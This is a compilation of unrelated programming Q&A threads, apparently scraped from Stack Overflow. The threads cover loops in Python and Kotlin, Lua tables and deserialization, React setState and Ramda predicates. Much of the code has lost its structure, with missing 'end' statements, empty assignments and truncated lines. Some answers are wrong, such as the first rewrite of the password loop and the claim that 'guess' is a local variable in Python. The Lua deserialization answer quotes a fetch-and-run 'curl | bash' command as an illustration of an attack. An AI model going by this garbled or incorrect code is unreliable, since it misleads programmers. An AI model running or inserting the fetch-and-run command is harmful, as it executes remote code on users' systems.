My while loop wont end when condition is met - while-loop

So what I am trying to do is make a program that makes the user enter a password. If the password is correct, or if there attempts reach a total of 3 the program should stop... but it doesn't.
password = "password"
guess = ""
tries = 0
while guess != password or tries != 3:
guess = input("Password: ")
tries += 1
print(f"{abs(tries - 3)} Tries Remaining.")

Write like this:
password = "password"
tries = 0
while True:
if tries == 3:
guess = input("Password: ")
if guess == password:
tries += 1
print(f"{abs(tries - 3)} Tries Remaining.")

Your conditional needs to be a logical AND, not a logical OR.
while guess != password and tries != 3:
When you use a logical OR, the while loop continues if either expression evaluates to true.
So with the logical AND, when tries == 3, the second expression evaluates to false and we exit the loop.

The guess inside the while loop is a local variable , so the global variable remains unchanged. global guess is always '' and so the condition always evaluates to true.


Variable with multiple values to use

Im editing a script for fivem and Im trying to store multiple values into a variable then using an if statement to see if a player has one of the values in his inventory. So far i have this
Config.ItemVapeLiquid = 'liquid', 'liquidice', 'liquidberry'
the problem I'm having is it only runs when the player has 'liquid' on them, when they don't, it returns a nil value even if they have 'liquidice' or 'liquidberry'. what im trying to get do is:
Config.ItemVapeLiquid = 'liquid', 'liquidice', 'liquidberry'
if the player has a value from ItemVapeLiquid then
allow player to add liquid
I want it to check all the values in the variable before returning nil as it seems to be checking 1 value and returning nil if its not in the inventory
I appreciate any help!
While the first line compiles, it will ignore any unassigned values ('liquidice', 'liquidberry').
It expects three variables:
local a, b, c = 'liquid', 'liquidice', 'liquidberry'
Since that's impractical you need an array instead, as well as a function to search within that array:
Config.ItemVapeLiquid = {'liquid', 'liquidice', 'liquidberry'}
function check(array, value)
for _,v in ipairs(array) do
if v == value then
return true
return false
print(check(Config.ItemVapeLiquid, 'liquid'))
print(check(Config.ItemVapeLiquid, 'liquidice'))
print(check(Config.ItemVapeLiquid, 'liquidberry'))
print(check(Config.ItemVapeLiquid, 'something'))
If you plan on calling checks more often, consider transforming the array into a set instead, since this is much faster:
-- feel free to make an array-to-set function for this
Config.ItemVapeLiquid = {
['liquid'] = true,
['liquidice'] = true,
['liquidberry'] = true
Notice that a missing element is now nil, which evaluates to false and is therefore usually fine. If you really need a false value, append:
Config.ItemVapeLiquid["something"] or false

Trying to setState using eval() function (React Native)

I'm trying to set multiple states in a for loop to be false or true depending on whether they meet the (if statement) requirement. The for loop will loop through an array of strings, each string represents a state. But I can't seem to use eval within this.setState function...
I have tried researching online but none of the solutions match my problem or what I'm trying to solve. I even tried eval(this.state.anything) = false but it still doesn't work and shows a left hand assign invalid error.
let businessState = [
var temp = ""
for (i = 0; i < businessState.length; i++) {
if (eval(businessState[i]) == ""){
temp = businessState[i]+ "Error"
eval(temp): true
As you can see from the code above, I want to evaluate the state, and if the value that this particular state holds is an empty string "", I want to set this state name + "Error" (For example, if is empty string "" I want to set this.state.emailError to true.
Instead of this.setState({eval(temp): true}) try this.setState({[temp]: true}). The brackets will output the string value stored in temp as a variable name in setState.
This article gives a good explanation
This Stack Overflow question and the accepted answer also should help

Why does R.all with R.both does not equal R.allPass with the same arguments?

I'm just learning while doing ramda.js. Well, there are many ways to reach a goal with ramda, but there is on thing I do not understand.
I would like to check the input for an array of strings that all match one regular expression. I thought I could do it R.all(R.both(isString, isRegExp)), but it seems to deliver a true when the input is a number.
As expected R.allPass([isString, isRegExp]) gives a false with a number input.
But can anyone please explain me why R.all is returning a true? Or what and where is mistake (in thinking)?
Complete code:
var isString =,
isMyRegExp = R.test(/^[a-z]+$/),
isMyRegExpString = R.both(isString, isMyRegExp),
isArrayOfMyRegExpStrings = R.all(isMyRegExpString),
isArrayOfMyRegExpStringsPass = R.allPass([isString, isMyRegExp]),
result = {
'all': isArrayOfMyRegExpStrings(9),
'allPass': isArrayOfMyRegExpStringsPass(9)
// {
// all: true,
// allPass: false
// }
I know that I could shorten conditions with just the regexp, but there could be other situations where I need both conditions to be true. eg. isArrayOfNumber and sumOfNumbersOver50.
The second argument to R.all is expecting a list of values to test. Due to the way the function is implemented it is treating the 9 in your example as an empty list, resulting in a vacuous truth and evaluating to true.

Kotlin - Problems with while()

I was making a calculator in Kotlin and I'm having trouble solving an issue that I'm having with while().On this particular part of the code, I'm trying to find the first operator in the equation, but I need to exclude the ones that indicate whether a number is negative - (or positive +, optional), which need to be indicated between parentheses like so: (-5)
var charay = charArrayOf('+', '-', '*', '/')
var op = 0
var reference = 0
var bol = false
while( bol == false && op != -1){
println(bol == false && op != -1)
op = input.indexOfAny(charay, reference)
if (!input.get(op - 1).equals('(')){
bol = true
reference = op + 1
println(bol == false && op != -1)
To test a normal equation I entered the equation 4+4 and the console looks like this:
Exception in thread "main" java.lang.StringIndexOutOfBoundsException:
String index out of range: -2
at java.lang.String.charAt(
at CalculatorKt.CalculateValue(Calculator.kt:67)
at CalculatorKt.CalculateValue(Calculator.kt:108)
at CalculatorKt.main(Calculator.kt:119)
Like I suspected, for some reason, the variables reset at the end of the while(), which is the reason why it never leaves said while(). Can anyone tell me why?
Read the error. You're trying to read the character of a string at an index that doesn't exist with this statement:
input.get(op - 1)
You need to check what op is first to make sure it is found. indexOfAny returns -1 if not found in the string. Because we can't see what charay is, we can't help you further.

Deserialization in Lua

I have already serialized a table in lua.Does lua have any function to deserialize it?
function dump(o)
if type(o) == 'table' then
local s = '{ '
for k,v in pairs(o) do
if type(k) ~= 'number' then k = '"'..k..'"' end
s = s .. '['..k..'] = ' .. dump(v) .. ','
return s .. '} '
return tostring(o)
local people = {
name = "Fred",
address = "16 Long Street",
phone = "123456"
name = "Wilma",
address = "16 Long Street",
phone = "123456"
name = "Barney",
address = "17 Long Street",
phone = "123457"
file ="test.lua", "a")
file:write("People:", dump(people))
The output of this program is:
People: { [1] = { ["phone"] = 123456,["name"] = Fred,["address"] = 16 Long Street,} ,[2] = { ["phone"] = 123456,["name"] = Wilma,
["address"] = 16 Long Street,} ,[3] = { ["phone"] = 123457,["name"] = Barney,["address"] = 17 Long Street,} ,}
Please suggest a way to Deserialize it in lua.
If you slightly change your code…
return s .. '} '
+++ elseif type(o) == 'string' then
+++ return ("%q"):format( o )
return tostring(o)
…you generate valid Lua.
Now you can
local function condfail( cond, ... )
if not cond then return nil, (...) end
return ...
function deserialize( str, vars )
-- create dummy environment
local env = vars and setmetatable( {}, {__index=vars} ) or {}
-- create function that returns deserialized value(s)
local f, _err = load( "return "..str, "=deserialize", "t", env )
if not f then return nil, _err end -- syntax error?
-- set up safe runner
local co = coroutine.create( f )
local hook = function( ) debug.sethook( co, error, "c", 1000000 ) end
debug.sethook( co, hook, "c" )
-- now run the deserialization
return condfail( coroutine.resume( co ) )
to deserialize the data in a reasonably safe way.
The unsafe way to deserialize the data would be to simply load( "return "..str )( ), but that would permit running arbitrary Lua code.
First, we put the function in a separate environment so it cannot influence the global environment. (Else, doing, say, print = function() os.execute "curl | bash" end would replace a function with something that is later called from a different (unprotected) context and runs arbitrary code.) For convenience, you could pass in a table so the data can refer to pre-defined variables. (You're probably not going to need this, but if you ever need pre-defined constants that's how to provide them.)
Next, we run the function in a separate coroutine so we can set a debug hook that doesn't influence the rest of the program. And then we can forbid doing any function calls by effectively setting debug.sethook( co, error, "c" ). (Because the initial call of the function that "is"/returns your data would already trigger this, we delay this by one call. So we set a hook that changes the hook to error when called.)
Now all function calls are forbidden and the outside cannot be influenced by the running code. The only remaining thing that an attacker can do is waste time - e.g. by endless loops like while true do end or ::x:: goto x. So we also set a maximum instruction count when setting the hook – debug.sethook( co, error, "c", 1000000 ). One million instructions should be enough for relatively large files. It's an arbitrary limit – increase it if it's too small. (It's enough to count up to 250000 in a loop so creating more than this many primitive values is possible).
One cheap way to deserialize data is to run it. While serializing, you build executable source. Much like you already did, but add few details - add 'return' in front of table constructor, and enclose strings with quote signs, probably some escaping will be required if strings contain quote signs inside.
Note though that it's ok for trusted data only. When data comes from external sources it may contain not just expected data, but also some code that might want to compromise your system.
Otherwise you can try json, there's lots of libs already available for json serializing/deserializing.